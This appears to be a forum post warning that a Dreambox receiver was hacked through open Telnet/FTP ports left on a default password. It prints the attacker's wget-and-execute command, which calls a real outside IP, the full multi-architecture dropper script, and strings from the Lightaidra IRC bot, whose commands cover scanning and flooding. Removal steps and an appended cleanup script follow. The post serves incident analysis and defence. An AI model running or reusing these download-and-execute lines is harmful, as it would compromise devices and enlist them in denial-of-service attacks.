Hi friends,
Yesterday I noticed that my Dreambox 7020HD had been hacked. I want to warn you about it.
How the hack happened:
A while ago I opened the Telnet/FTP port on the router and forwarded it to the Dreambox. Since the Dreambox was new, I hadn't changed the password. After I finished what I needed to do, I forgot to close the ports. They stayed open for about a week.
How I noticed the hack:
In the last few days my router started stalling and the Dreambox wasn't running properly. So I decided to take a look, connected over telnet and poked around a bit. This command caught my attention:
Code:
rm -rf /var/run/getbinaries.sh; wget -c http://108.166.187.75/getbinaries.sh -P /var/run && sh /var/run/getbinaries.sh&
What this command does:
It deletes the getbinaries.sh file in the /var/run/ directory, then downloads a fresh copy from the IP 108.166.187.75 with wget and saves it in the /var/run directory. Finally it runs it.
Of course I downloaded this file with wget to examine it. The file's content is as follows:
Code:
#!/bin/sh
# THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
# UPLOAD GETBINARIES.SH IN YOUR HTTPD.
# YOUR HTTPD SERVER:
REFERENCE_HTTP="http://108.166.187.75"
# NAME OF BINARIES:
REFERENCE_MIPSEL="mipsel"
REFERENCE_MIPS="mips"
REFERENCE_SUPERH="sh"
REFERENCE_ARM="arm"
REFERENCE_PPC="ppc"
rm -fr /var/run/${REFERENCE_MIPSEL} \
/var/run/${REFERENCE_MIPS} \
/var/run/${REFERENCE_SUPERH} \
/var/run/${REFERENCE_ARM} \
/var/run/${REFERENCE_PPC}
wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPSEL} -P /var/run && chmod +x /var/run/${REFERENCE_MIPSEL} && /var/run/${REFERENCE_MIPSEL}
wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPS} -P /var/run && chmod +x /var/run/${REFERENCE_MIPS} && /var/run/${REFERENCE_MIPS}
wget -c ${REFERENCE_HTTP}/${REFERENCE_ARM} -P /var/run && chmod +x /var/run/${REFERENCE_ARM} && /var/run/${REFERENCE_ARM}
wget -c ${REFERENCE_HTTP}/${REFERENCE_PPC} -P /var/run && chmod +x /var/run/${REFERENCE_PPC} && /var/run/${REFERENCE_PPC}
wget -c ${REFERENCE_HTTP}/${REFERENCE_SUPERH} -P /var/run && chmod +x /var/run/${REFERENCE_SUPERH} && /var/run/${REFERENCE_SUPERH}
sleep 3;
rm -fr /var/run/getbinaries.sh
What this script does:
In short, it downloads 5 files (mipsel, mips, sh, arm and ppc) from the IP 108.166.187.75 and then tries to run them in the /var/run/ directory. The names speak for themselves. Looking at the files with the file command:
Code:
arm: ELF 32-bit LSB executable, ARM, version 1, statically linked, not stripped
mips: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
mipsel: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
ppc: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, not stripped
sh: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, not stripped
Of course, since the Dreambox 7020HD is mipsel (little endian), the mipsel file is the one that ran.
When I examined this file with the strings command, I realised they had turned my Dreambox 7020HD into a bot:
A small excerpt of the strings output:
Code:
PRIVMSG %s :* *** Access Commands:
PRIVMSG %s :*
PRIVMSG %s :* .login <password> - login to bot's party-line
PRIVMSG %s :* .logout - logout from bot's party-line
PRIVMSG %s :* *** Miscs Commands
PRIVMSG %s :* .exec <commands> - execute a system command
PRIVMSG %s :* .version - show the current version of bot
PRIVMSG %s :* .status - show the status of bot
PRIVMSG %s :* .help - show this help message
PRIVMSG %s :* *** Scan Commands
PRIVMSG %s :* .advscan <a> <b> <user> <passwd> - scan with user:pass (A.B) classes sets by you
PRIVMSG %s :* .advscan <a> <b> - scan with d-link config reset bug
PRIVMSG %s :* .advscan->recursive <user> <pass> - scan local ip range with user:pass, (C.D) classes random
PRIVMSG %s :* .advscan->recursive - scan local ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random <user> <pass> - scan random ip range with user:pass, (A.B) classes random
PRIVMSG %s :* .advscan->random - scan random ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random->b <user> <pass> - scan local ip range with user:pass, A.(B) class random
PRIVMSG %s :* .advscan->random->b - scan local ip range with d-link config reset bug
PRIVMSG %s :* .stop - stop current operation (scan/dos)
PRIVMSG %s :* *** DDos Commands:
PRIVMSG %s :* NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing,
PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs
PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86
PRIVMSG %s :* .spoof <ip> - set the source address ip spoof
PRIVMSG %s :* .synflood <host> <port> <secs> - tcp syn flooder
PRIVMSG %s :* .ngsynflood <host> <port> <secs> - tcp ngsyn flooder (new generation)
PRIVMSG %s :* .ackflood <host> <port> <secs> - tcp ack flooder
PRIVMSG %s :* .ngackflood <host> <port> <secs> - tcp ngack flooder (new generation)
PRIVMSG %s :* *** IRC Commands:
PRIVMSG %s :* .setchan <channel> - set new master channel
PRIVMSG %s :* .join <channel> <password> - join bot in selected room
PRIVMSG %s :* .part <channel> - part bot from selected room
PRIVMSG %s :* .quit - kill the current process
PRIVMSG %s :* *** EOF
JOIN %s :%s
PING 0313370
PRIVMSG %s :[logout] you are logged out!, (%s).
%*s%*s%*s%*s%255[^
PRIVMSG %s :[!exec] error on command: %s
(NULL)
PRIVMSG %s :[exec] result of "%s":
PRIVMSG %s :%s
PRIVMSG %s :[version] lightaidra 0x2012.
PRIVMSG %s :[status] currently not working.
PRIVMSG %s :[status] working on %s
PRIVMSG %s :[spoof] spoofing set as random ip!
PRIVMSG %s :[error] one error in your input data, see help!
PRIVMSG %s :[spoof] spoofing set as ip: %s
advscan scanning range %s.%s.0.0/16 (user:%s pass:%s)
advscan scanning range %s.%s.0.0/16
PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16 (user:%s pass:%s), wait..
PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16, wait..
PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16. wait..
PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16 (user:%s pass:%s). wait..
PRIVMSG %s :[stop] %s was stopped!
operation
QUOTE ZOMBIE
PRIVMSG %s :[chan] %s setted as master channel.
PART %s :%s
Aidra?!
QUIT :pwn!
synflood packeting %s:%u (secs: %u)
PRIVMSG %s :[synflood] start packeting: %s:%u (secs: %u).
ngsynflood packeting %s:%u (secs: %u)
PRIVMSG %s :[ngsynflood] start packeting: %s:%u (secs: %u).
ackflood packeting %s:%u (secs: %u)
PRIVMSG %s :[ackflood] start packeting: %s:%u (secs: %u).
ngackflood packeting %s:%u (secs: %u)
PRIVMSG %s :[ngackflood] start packeting: %s:%u (secs: %u).
/var/run/.lightscan
PRIVMSG %s :[error] unable to open: %s
For those who want to investigate the strings output, I've uploaded the strings.txt file.
What you need to do to remove the hack:
Of course, close the Telnet/FTP ports. Then find the ID of /var/run/mipsel with the ps command and terminate the program with kill ID. Finally, delete /var/run/mipsel with rm. Of course, since I don't fully know the program's code, I don't know whether deleting it is enough. Since it reached your network, it can of course also get into other systems. But I don't know whether the program spreads to other systems either.
If you want to examine the binaries, PM me and I can give them to you.
Regards
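The cleanup steps above, as an added shell example that is not part of the original post: it checks a root filesystem for the dropped files and the downloader line and removes them. The /etc/rc.local and /etc/init.d locations are my assumption; the post does not say where the wget command was found.

```shell
#!/bin/sh
# Added example, not from the original post: check a Dreambox-style root
# filesystem for the artifacts named above and remove them. ROOT ($1)
# defaults to the live system; point it at a copied or mounted tree to
# test offline. The startup-script locations are an assumption: the post
# does not say where the wget line was planted, but a bot that must
# survive a reboot is usually started from rc.local or an init.d script.

DROPPED="mipsel mips sh arm ppc getbinaries.sh .lightscan"

# Print the startup scripts under $1 that still carry the downloader line.
aidra_rc_hits() {
    for f in "$1"/etc/rc.local "$1"/etc/init.d/* "$1"/etc/rc*.d/*; do
        [ -f "$f" ] || continue
        grep -q -e 'getbinaries\.sh' -e '108\.166\.187\.75' "$f" && echo "$f"
    done
    return 0
}

# Report every indicator under $1. Returns 0 when clean, 1 when infected.
aidra_check() {
    root="${1%/}"; found=0          # "/" or empty both become the live root
    for name in $DROPPED; do
        [ -e "$root/var/run/$name" ] || continue
        echo "indicator: $root/var/run/$name"; found=1
    done
    for f in $(aidra_rc_hits "$root"); do
        echo "indicator: $f references the getbinaries.sh downloader"; found=1
    done
    return $found
}

# Kill the bot, delete the dropped files and strip the downloader line
# from the startup scripts so it does not come back on the next boot.
aidra_clean() {
    root="${1%/}"
    for name in mipsel mips sh arm ppc; do
        # -f matches the full command line (both procps and busybox pkill)
        pkill -f "$root/var/run/$name" 2>/dev/null || true
    done
    for name in $DROPPED; do rm -f "$root/var/run/$name"; done
    for f in $(aidra_rc_hits "$root"); do
        sed -i -e '/getbinaries\.sh/d' -e '/108\.166\.187\.75/d' "$f"
    done
}
```

Run `aidra_check` first and keep its output; it is your record of what was on the box before `aidra_clean` removes it.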